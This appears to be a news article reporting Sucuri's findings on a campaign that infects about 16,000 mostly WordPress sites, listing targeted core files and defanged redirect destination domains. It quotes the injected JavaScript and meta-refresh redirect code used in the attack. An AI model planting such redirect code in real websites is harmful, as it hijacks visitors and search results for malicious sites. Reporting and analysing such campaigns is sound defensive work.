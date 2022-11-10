Sucuri has published a report that threatens the websites by turning them into SEO poisoning sites to promote malicious Q&A sites.

poisoning sites to promote malicious Q&A sites. The redirections are done through ois[.]is domain and it uses an unusual way to redirect: .png image files.

Currently, there are almost 16,000 websites infected most of which are WordPress -based, and the number is growing fast.

Sucuri, a website security company, has published a report regarding ongoing attacks on websites most of which are based on WordPress. According to the report, malicious actors are currently hacking websites to redirect them to fake Q&A via ois[.]is.

The number of infected websites is growing

Sucuri states that there are nearly 15,000 websites that have been affected in this campaign; as we checked PublicWWW results while writing this article, it has almost reached 16,000. Also, Sucuri‘s own SiteCheck scanner discovered more than 2,500 websites redirected to ois[.]is in September and October.

The purpose of this campaign looks like preparing some websites by confusing search engines and making them believe that those are credible sites; putting them in higher places in search results. They are likely to be used in other campaigns in the future to spread malware or steal credentials through phishing.

100 files per website

ois[.]is redirects are achieved through infecting approximately 100 files of the target website; the most commonly infected ones are listed below:

./wp-signup.php

./wp-cron.php

./wp-links-opml.php

./wp-settings.php

./wp-comments-post.php

./wp-mail.php

./xmlrpc.php

./wp-activate.php

./wp-trackback.php

./wp-blog-header.php

« If the malware does not detect a logged in user or login attempt it then injects the malicious JavaScript code. There are two common variations of redirect scripts currently in circulation. »

The basic redirects’ code looks like the one below, utilizing window.location.href and meta refresh redirects:

<script>window.location.href='hxxps://ois[.]is/images/logo.png';</script><meta http-equiv='refresh' content='0;URL=hxxps://ois[.]is/images/logo.png'>

The sophisticated version stores information in the visitor’s browser localStorage so they will not be redirected more than every 2 or 6 hours.

Those are all redirected to .png files, which are named logo.png in the basic variant or logo-X.png (X: between 1 and 8) in the sophisticated variant. The hackers also utilize a bit.ly address to hide their links.

Redirect destinations

While using .png files to initiate redirect is an interesting way to go, the malware uses window.location.href function to redirect to a Google search result URL of a website that is being prepared for a future campaign. Sucuri has managed to identify the following destinations:

en.w4ksa[.]com

peace.yomeat[.]com

qa.bb7r[.]com

en.ajeel[.]store

qa.istisharaat[.]com

en.photolovegirl[.]com

en.poxnel[.]com

qa.tadalafilhot[.]com

questions.rawafedpor[.]com

qa.elbwaba[.]com

questions.firstgooal[.]com

qa.cr-halal[.]com

qa.aly2um[.]com

Since there is no one single vulnerability found that is helping the hackers achieve their redirect infection goals, Sucuri advises website admins to change their all administrator and access point passwords, and update their all software.